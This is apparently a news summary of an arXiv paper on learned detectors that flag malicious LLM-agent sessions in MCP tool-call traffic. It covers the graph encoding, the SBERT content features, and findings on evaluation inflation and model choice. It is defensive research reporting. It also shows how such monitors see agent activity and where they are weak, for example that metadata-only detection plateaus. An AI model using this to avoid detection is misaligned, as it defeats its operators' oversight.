arXiv: Content-Aware Attack Detection in LLM Agent Tool-Call Traffic

2026-05-25 Research by al-ice.ai Editorial

AI relevance: As MCP becomes the dominant tool-calling interface for LLM agents, detecting malicious tool-call sessions in real time is an unsolved operational problem — this paper provides the first systematic evaluation of learned detectors over MCP traffic.

Researchers from Sultan Zavrak and collaborators published arXiv:2605.11053 (v3, updated May 22), proposing a graph-based attack detection framework for MCP tool-call traffic. The approach encodes each agent session as a graph — tool calls as nodes, sequential and data-flow links as edges — and enriches nodes with sentence-embedding features over arguments and responses.

Key findings

Content-level features are essential. Metadata-only detection plateaus around AUROC 0.64 regardless of architecture. Adding SBERT content embeddings pushes AUROC above 0.89, with tree ensembles on pooled embeddings reaching 0.975.
Naive random-split evaluations inflate results by up to 26 percentage points compared to task-disjoint splits. This memorization confound has not been addressed in prior agent-detection literature.
Simple models outperform complex ones. Tree ensembles on pooled SBERT embeddings (AUROC 0.975) outperformed GNNs (GraphSAGE at 0.917) and an MLP (0.896) in the primary RAS-Eval setting.
Self-supervised pre-training provided no label-efficiency advantage on this detection task, contrary to expectations from other NLP domains.
Evaluated three GNN architectures (GAT, GCN, GraphSAGE), an MLP baseline, and classical models (XGBoost, random forest, logistic regression, linear SVM) across RAS-Eval, ATBench, and a combined-source variant.

Why it matters

Most MCP deployments today rely on prompt-based safety or allow/deny lists. This work shows that learned detection is feasible with the right feature engineering, but also warns that evaluation methodology matters enormously — results inflated by random splits may give false confidence in production.

What to do

If you operate MCP servers or agent tool-call pipelines, incorporate content-level features (not just metadata) into any detection logic.
Use task-disjoint evaluation splits when testing detection models — random splits will overestimate real-world performance.
Don't assume GNNs are automatically superior; tree ensembles on pooled embeddings may give better results at lower computational cost.

arXiv: Content-Aware Attack Detection in LLM Agent Tool-Call Traffic

Key findings

Why it matters

What to do

Sources